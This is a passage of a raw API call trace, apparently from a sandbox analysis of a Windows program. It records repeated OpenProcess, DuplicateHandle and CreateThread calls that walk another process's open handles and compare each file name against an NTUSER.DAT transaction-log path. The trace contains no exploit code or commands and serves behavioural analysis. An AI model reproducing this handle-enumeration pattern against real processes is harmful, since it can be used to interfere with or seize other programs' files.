[0166.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.182] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.183] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.183] CloseHandle (hObject=0x1e4) returned 1 [0166.183] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.183] CloseHandle (hObject=0x194) returned 1 [0166.183] CloseHandle (hObject=0x1e8) returned 1 [0166.183] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.183] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.183] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.186] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.189] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.189] CloseHandle (hObject=0x1e4) returned 1 [0166.189] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.189] CloseHandle (hObject=0x194) returned 1 [0166.190] CloseHandle (hObject=0x1e8) returned 1 [0166.190] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.190] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x58c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.190] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.191] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.191] CloseHandle (hObject=0x1e4) returned 1 [0166.191] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.191] CloseHandle (hObject=0x194) returned 1 [0166.191] CloseHandle (hObject=0x1e8) returned 1 [0166.191] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.191] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.192] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.193] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.193] CloseHandle (hObject=0x1e4) returned 1 [0166.193] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.193] CloseHandle (hObject=0x194) returned 1 [0166.193] CloseHandle (hObject=0x1e8) returned 1 [0166.193] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.193] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.194] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.195] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.195] CloseHandle (hObject=0x1e4) returned 1 [0166.195] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.195] CloseHandle (hObject=0x194) returned 1 [0166.195] CloseHandle (hObject=0x1e8) returned 1 [0166.195] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.195] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.196] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.197] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.197] CloseHandle (hObject=0x1e4) returned 1 [0166.197] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.197] CloseHandle (hObject=0x194) returned 1 [0166.197] CloseHandle (hObject=0x1e8) returned 1 [0166.197] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.197] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.198] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.199] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.199] CloseHandle (hObject=0x1e4) returned 1 [0166.199] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.199] CloseHandle (hObject=0x194) returned 1 [0166.199] CloseHandle (hObject=0x1e8) returned 1 [0166.199] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.199] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.200] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.201] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.201] CloseHandle (hObject=0x1e4) returned 1 [0166.201] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0166.201] CloseHandle (hObject=0x194) returned 1 [0166.201] CloseHandle (hObject=0x1e8) returned 1 [0166.201] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.201] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.202] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.203] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.203] CloseHandle (hObject=0x1e4) returned 1 [0166.203] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.203] CloseHandle (hObject=0x194) returned 1 [0166.203] CloseHandle (hObject=0x1e8) returned 1 [0166.203] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.203] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.204] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.205] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.205] CloseHandle (hObject=0x1e4) returned 1 [0166.205] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.205] CloseHandle (hObject=0x194) returned 1 [0166.205] CloseHandle (hObject=0x1e8) returned 1 [0166.205] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.206] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.206] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.207] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.207] CloseHandle (hObject=0x1e4) returned 1 [0166.207] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.207] CloseHandle (hObject=0x194) returned 1 [0166.207] CloseHandle (hObject=0x1e8) returned 1 [0166.208] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.208] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.208] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.209] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.209] CloseHandle (hObject=0x1e4) returned 1 [0166.209] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.209] CloseHandle (hObject=0x194) returned 1 [0166.209] CloseHandle (hObject=0x1e8) returned 1 [0166.209] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.209] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.210] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.211] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.211] CloseHandle (hObject=0x1e4) returned 1 [0166.211] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.211] CloseHandle (hObject=0x194) returned 1 [0166.211] CloseHandle (hObject=0x1e8) returned 1 [0166.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.211] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.212] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.213] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.213] CloseHandle (hObject=0x1e4) returned 1 [0166.213] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.213] CloseHandle (hObject=0x194) returned 1 [0166.213] CloseHandle (hObject=0x1e8) returned 1 [0166.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.214] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.215] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.215] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.215] CloseHandle (hObject=0x1e4) returned 1 [0166.216] CloseHandle (hObject=0x194) returned 1 [0166.216] CloseHandle (hObject=0x1e8) returned 1 [0166.216] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.216] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.216] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.217] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.217] CloseHandle (hObject=0x1e4) returned 1 [0166.217] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.217] CloseHandle (hObject=0x194) returned 1 [0166.217] CloseHandle (hObject=0x1e8) returned 1 [0166.218] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.218] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.218] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.219] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.219] CloseHandle (hObject=0x1e4) returned 1 [0166.219] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0166.219] CloseHandle (hObject=0x194) returned 1 [0166.220] CloseHandle (hObject=0x1e8) returned 1 [0166.220] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.220] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.221] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.222] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.222] CloseHandle (hObject=0x1e4) returned 1 [0166.222] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0166.222] CloseHandle (hObject=0x194) returned 1 [0166.222] CloseHandle (hObject=0x1e8) returned 1 [0166.222] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.222] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.223] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.224] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.224] CloseHandle (hObject=0x1e4) returned 1 [0166.224] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.224] CloseHandle (hObject=0x194) returned 1 [0166.224] CloseHandle (hObject=0x1e8) returned 1 [0166.224] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.224] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.225] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.226] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.226] CloseHandle (hObject=0x1e4) returned 1 [0166.226] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -15 [0166.226] CloseHandle (hObject=0x194) returned 1 [0166.226] CloseHandle (hObject=0x1e8) returned 1 [0166.227] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.227] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x948, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.227] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.227] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.228] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.228] CloseHandle (hObject=0x1e4) returned 1 [0166.228] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.228] CloseHandle (hObject=0x194) returned 1 [0166.229] CloseHandle (hObject=0x1e8) returned 1 [0166.229] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.229] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.230] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.230] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.231] CloseHandle (hObject=0x1e4) returned 1 [0166.231] CloseHandle (hObject=0x194) returned 1 [0166.231] CloseHandle (hObject=0x1e8) returned 1 [0166.231] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.231] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.231] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.232] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.232] CloseHandle (hObject=0x1e4) returned 1 [0166.232] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.232] CloseHandle (hObject=0x194) returned 1 [0166.232] CloseHandle (hObject=0x1e8) returned 1 [0166.232] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.233] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.233] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.233] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.234] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.234] CloseHandle (hObject=0x1e4) returned 1 [0166.234] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.234] CloseHandle (hObject=0x194) returned 1 [0166.235] CloseHandle (hObject=0x1e8) returned 1 [0166.235] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.235] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.236] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.236] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: 